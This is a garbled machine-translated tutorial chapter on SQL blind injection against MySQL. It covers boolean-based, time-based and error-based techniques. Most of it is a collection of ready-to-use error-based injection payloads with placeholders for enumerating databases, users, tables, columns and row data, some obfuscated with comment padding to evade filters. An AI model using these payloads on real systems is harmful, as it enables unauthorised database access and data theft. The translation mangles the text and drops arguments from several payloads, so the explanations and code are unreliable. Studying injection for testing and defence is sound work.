The fourth chapter of Web Security--About SQL Blinds

One, SQL Blind Note:

Cannot see the echo, cannot from return directly reads to the database content the data The Guess solution, belongs to the blind note.

Second, the first kind-based on the Boolean type of blind Note:

This is very simple, the most typical example is to dig SQL injection when used:

1 " " 2 http://www.localhost.com/sqlinjection?id=1 '%20and%20 ' 1 ' = ' 1 3 http://www.localhost.com/sqlinjection?id=1 '%20and%20 ' 1 ' = ' 2 4 " "

In combat. Before a judgment is ever true, splice a judgment, for example "substring (Database (),") = ' A ' "

1 """ 2 such as id=1, there is a normal echo 3 Then: 4 id = 1 and substring (database (), +) = ' A ' 5 if the back is right, there is a return, no, no, so one burst out 6 """

Third, the second kind-based on the time type of blind note:

1 """ 2 SELECT * FROM tablename where id= ' 103 ' and if (substring (database (),) = ' A ', sleep (5), null) '; 3 """

Here if the first character is successfully guessed, it will sleep 5s otherwise "if (EXPR1,RESULT1,RESULT2) #如果expr1成立 result1 otherwise result2"

Please refer to the above two details:

Web security fourth-intimate access to databases: SQL injection attacks

Iv. the third type-Special error injection (the focus of this session):

0, the error here refers to

1, floor Error

(1) Formula:

1 """ 2 id=2 ' and (select 1 from (SELECT COUNT (*), concat ((rand (0)), (select (Core statement) from Information_schema.tables Lim it 0,1)) x from Information_schema.tables Group by x)--+3 ""

(2) Principle:

Cite a blog from Reber https://www.jianshu.com/p/8c2343705100

1 """2 Floor () is taken as an integer3 rand () generates a random number between 0 and 14 rand (0) * * will take 0 to 2 random numbers5 Floor (rand () * *) There are two records will be error6 Floor (rand (0) * *) records need to be more than 3, and more than 3 will be error, the return value is regular7 COUNT (*) is used to count results, which is equivalent to refreshing a result8 Group by in grouping the data will first look at the virtual table there is no such value, no words to insert, the existence of the word count (*) plus 19 when using group BY, the Floor (rand (0) * *) is executed once, and if no record exists for the virtual table, it is executed again when the virtual table is inserted, resulting in duplicate-and-error presence in the primary keyTen """

V. payload--> the statement of the blasting data:

1. Database Information

# database Count' and (select 1 from (Select+count (*), concat (select (Select (Select+concat (0x7e7e3a7e7e, COUNT ( Distinct table_schema), 0x7e7e3a7e7e) from Information_schema.tables) (Information_schema.tables limit 0,1), floor (rand (0) *)) X from Information_schema.tables Group by X) a)--+#database name' and (select 1 from (SELECT COUNT (*), Concat ((select (SELECT DISTINCT concat (0x7e7e3a7e7e, Table_schema, 0x7e7e3a7e7e) from Information_ Schema.tables limit%d,1)) from Information_schema.tables limit 0,1), floor (rand (0) *)) x from Information_schema.tables Group by X) a)--+

2. Current DB information

1 # Current-database-name 2 ' +and (Select/**/1/**/from (Select/**/count (*), concat (select/**/(select/**/(Select/**/concat (0x7e7e3a7e7e,/* */(Select/**/database ()),/**/0x7e7e3a7e7e))) (/**/from/**/information_schema.tables/**/limit/**/0,1), Floor (rand ( 0))) x/**/from/**/information_schema.tables/**/group/**/by/**/x)--+3#Current 

3. Current User Information

1 # Current USER 2 ' +and (Select/**/1/**/from (Select/**/count (*), concat (select/**/(select/**/(Select/**/concat (0x7e7e3a7e7e,/* */(Select/**/user ()),/**/0x7e7e3a7e7e))) (/**/from/**/information_schema.tables/**/limit/**/0,1), Floor (rand (0) * * )) x/**/from/**/information_schema.tables/**/group/**/by/**/x) a)--+3# Current

4. Table information

1 #Table Count2 '+and (Select/**/1/**/from (Select/**/count (*), concat (select/**/(select/**/(/**/select/**/concat ( 0x7e7e3a7e7e,/**/count (table_name),/**/0x7e7e3a7e7e)/**/from/**/information_schema.tables/**/where/**/table_ schema=%s)) (/**/from/**/information_schema.tables/**/limit/**/0,1), Floor (rand (0))) X/**/from/**/information_ schema.tables/**/group/**/by/**/x) a)--+3 #Table name4 '+and (Select/**/1/**/from (Select/**/count (*), concat (select/**/(select/**/(/**/select/**/concat ( 0X7E7E3A7E7E,/**/TABLE_NAME,/**/0X7E7E3A7E7E)/**/from/**/information_schema.tables/**/where/**/table_schema=%s /**/limit/**/%d,1)) (/**/from/**/information_schema.tables/**/limit/**/0,1), Floor (rand (0))) x/**/from/**/ information_schema.tables/**/group/**/by/**/x) a)--+

5. Column information

1 #column num2 '+and (select 1 from (SELECT COUNT (*), concat (SELECT (Select Concat (0x7e7e3a7e7e,count (column_name), 0x7e7e3a7e7e) from Information_schema.columns where table_name=%s and table_schema=%s)) from Information_schema.tables Limit 0,1), floor (rand (0) *)) x from Information_schema.tables Group by X) a)--+3 #Column Name4 '+and (select 1 from (SELECT COUNT (*), concat (SELECT (select Concat (0x7e7e3a7e7e,column_name,0x7e7e3a7e7e) From Information_schema.columns where table_name=%s and table_schema=%s limit%d,1)) from Information_schema.tables Limit 0,1), floor (rand (0) *)) x from Information_schema.tables Group by X) a)--+

6. Data

1 # Data 2 ' +and (select 1 from (SELECT COUNT (*), concat (SELECT (Select (select Concat (%s) from%s.%s limit%d,1) from information _schema.tables limit 0,1), floor (rand (0) *)) x from Information_schema.tables Group by X) a)--+

7. Supplement: Only valid for 32-bit:

id=2 and Updatexml (1,concat (0x7e, (SELECT @ @version), 0x7e), 1)--+
Id=1 and Extractvalue (1, concat (0x7e, (select @ @version), 0x7e))--+

Vi. Reference Documents:

http://wyb0.com/posts/injection-of-error-based/

The fourth chapter of Web Security--About SQL Blinds